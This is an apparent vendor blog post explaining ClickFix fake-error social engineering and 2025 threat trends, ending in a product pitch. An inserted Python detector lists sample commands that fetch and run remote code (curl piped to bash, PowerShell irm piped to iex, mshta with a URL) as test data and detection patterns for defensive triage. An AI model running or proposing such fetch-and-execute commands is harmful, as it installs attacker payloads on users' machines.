What is ClickFix and how do you stop it?
- ESET Expert
- Jul 24

ClickFix is a growing cyberthreat: a deceptive technique cybercriminals use to fool users into installing malicious software. This type of social engineering attack typically takes the form of a phony software update or browser warning, usually displaying a pop-up with the message "Your browser is out of date" or "Click here to fix the issue."
These phony warnings may appear authentic, but their purpose is to trick you into clicking without thinking. After clicking, the user might unintentionally install spyware, adware, or malware that could damage their device or steal private data.
How Does ClickFix Work?
From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring.
One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry. Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS.
The infostealer landscape also saw significant shifts. With Agent Tesla fading into obsolescence, SnakeStealer (also known as Snake Keylogger) surged ahead, becoming the most detected infostealer in our telemetry. Meanwhile, ESET contributed to major disruption operations targeting Lumma Stealer and Danabot, two prolific malware-as-a-service threats.
On the Android front, adware detections soared by 160%, driven largely by a sophisticated new threat dubbed Kaleidoscope. This malware uses a deceptive “evil twin” strategy to distribute malicious apps that bombard users with intrusive ads, degrading device performance. At the same time, NFC-based fraud shot up more than thirty-five-fold, fueled by phishing campaigns and inventive relay techniques. While the overall numbers remain modest, this jump highlights the rapid evolution of the criminals’ methods and their continued focus on exploiting NFC technology. Each new iteration of NFC threats – from NGate to GhostTap, and most recently SuperCard – demonstrates how attackers adapt to new security measures.
The ransomware scene descended (even further) into chaos, with fights between rival ransomware gangs impacting several players including the top ransomware as a service – RansomHub. Yearly data from 2024 shows that while ransomware attacks and the number of active gangs have grown, ransom payments saw a significant drop. This discrepancy may be the result of takedowns and exit scams that reshuffled the ransomware scene in 2024, but also partially due to diminished confidence in the gangs’ ability to keep their side of the bargain.
You're online when a pop-up window tells you to upgrade your browser or correct a problem.
The alert is a hoax, yet it seems authentic enough to trick a lot of people.
Malware is downloaded to your device when you click.
This program might monitor your activities, provide intrusive advertisements, or potentially steal banking information and passwords.
Who Is in Danger?
ClickFix frauds are common and can affect:
- People using desktop and mobile devices for surfing.
- Companies whose workers might inadvertently deploy malware.
- Businesses without adequate endpoint protection in place.
How to Protect Yourself from ClickFix Attacks
Awareness is the first defense. Being cautious with links, especially those promising a quick fix, is crucial. Understanding where a support message comes from and verifying its authenticity can prevent a major breach. It’s also important to ensure systems don’t automatically run instructions from URLs, and that both individual users and IT teams are trained to identify suspicious behavior.
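One way to turn the advice above about instructions that come from URLs into a check, as an added example that is not ESET's detection logic or part of the original post: it scans process-creation command lines for a URL combined with something that executes the fetched content. The rule names, patterns, hosts, users and example.test URLs are assumptions constructed for illustration.

```python
import re

# Assumed heuristics: a URL plus something that executes what was fetched.
URL = re.compile(r"https?://[^\s\"')]+", re.I)
RULES = {
    "url-piped-to-shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b", re.I),
    "url-evaluated-by-powershell": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url-run-by-script-host": re.compile(r"\bmshta(?:\.exe)?\s+[^|]*?https?://", re.I),
}

# Constructed process-creation events (host, user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws-014", "alice", "curl -s https://updates.example.test/fix.sh | bash"),
    ("ws-022", "bob", 'powershell -Command "irm https://verify.example.test/a | iex"'),
    ("ws-031", "carol", "mshta https://cdn.example.test/check.hta"),
    ("ws-014", "alice", "curl -O https://downloads.example.test/report.pdf"),
    ("ws-040", "dave", r"notepad C:\Users\dave\notes.txt"),
    ("mac-07", "erin", "ping -c 1 intranet.example.test"),
]


def indicators(command):
    """Return the names of the rules one command line trips."""
    if not URL.search(command):
        return []  # nothing remote involved, so not "instructions from a URL"
    return [name for name, pattern in RULES.items() if pattern.search(command)]


def triage(events):
    """Return flagged events with the rules hit and the URLs to investigate."""
    flagged = []
    for host, user, command in events:
        hits = indicators(command)
        if hits:
            flagged.append({"host": host, "user": user, "rules": hits,
                            "urls": URL.findall(command)})
    return flagged


if __name__ == "__main__":
    for event in triage(SAMPLE_EVENTS):
        print(event["host"], event["user"], ",".join(event["rules"]), *event["urls"])
```

A plain file download (the `curl -O` line) is not flagged, because nothing in that command executes the fetched content.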
Technology plays a major role in staying protected. With ESET’s multilayered security approach, threats like ClickFix can be identified and blocked before they take hold. ESET Endpoint Security doesn’t just detect known threats; it analyzes behavior, monitors link activity, and responds to suspicious actions in real time.
ClickFix attacks are a reminder that even helpful tools can be turned into threats. But with the right knowledge and the right protection, you can stay ahead of attackers.